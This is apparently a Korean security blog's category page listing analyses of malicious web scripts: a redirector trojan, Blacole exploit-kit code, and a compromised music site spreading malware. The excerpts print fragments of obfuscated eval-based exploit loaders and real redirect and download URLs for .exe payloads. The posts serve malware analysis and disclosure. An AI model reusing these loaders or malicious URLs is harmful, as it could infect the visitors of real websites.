본문 바로가기

악성스크립트

[Web Developer Forum - 2012.06.13] Malicious Code Inject: What Does It Do? 우연히 인터넷 검색을 하던 도중 발견한 2012년 해외 포럼에 올라온 글이다. Malicious Code Inject: What Does It Do? 라는 것을 보던 중에 오래된 방법이지만 이런 방법도 있구나 해서 적어놓는다. 1. 발견지 포럼(Web Developer Forum) : http://www.webdeveloper.com/forum/showthread.php?261600-Malicious-Code-Inject-What-Does-It-Do (Malicious Code Inject: What Does It Do?)-> http://oolbrmp.tld.cc/d/404.php?go=1 (window.location _=_ "http://fukbb.com")--> http://fukbb.com 2... 더보기
Trojan.JS.Redirector.zf [Kaspersky] 발견지 : http://gotosite.home.xs4all.nl/b&b/left.htmx (Trojan.JS.Redirector.zf - Kaspersky) -> http://deviced.com/vanilla/8BztG4W3.phx 바이러스 토탈 : https://www.virustotal.com/en/file/160b039d3ffc826fd73313780d61fb6f7e23d92da96dc40608e34cda2ab2c6d8/analysis/1372757516/ 우연히 돌아다니다가 발견해서 끄적끄적 해본다.....최종 접속 시 왜 ok 라는 시그널만 내보낼까 궁금하다................ 쿠키값때문인가??아시는 분 계시면 알려주세요~ : ) e=eval;v="0"+"x";a=0;z="y";tr.. 더보기
Exploit:JS/Blacole.KH (Microsoft) 우연히 해외 사이트를 보던 도중 Exploit 을 보아서 이렇게 써봅니다. 우선은 배치된 코드는 다음과 같습니다. try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{("".substr+"")()}catch(ehwdsh){try{window.document.body++}catch(gdsgsdg){dbshre=204;}}}} if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;} asgq=new Array (1,2,99,97,28,32,93,105,94,113,101,94,104,111,42,95,94,11.. 더보기
음반사이트 → http://www.leesmusic.co.kr (리스뮤직) 악성스크립트 유포중! 발견지 : http://www.leesmusic.co.kr [리스뮤직] →http://www.leesmusic.co.kr/./lees/index.php () →http://www.7iaa.com/index.html (서버죽음) →http://seoul-kla.com/admin/data/webedit/1.htm → http://www.baikec.cn/down/ko.exe(복호화 최종파일) → http://seoul-kla.com/admin/data/webedit/svchsot.exe(스크립트 내 연결 파일) if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");~>user agent의 정보얻은후 .. 더보기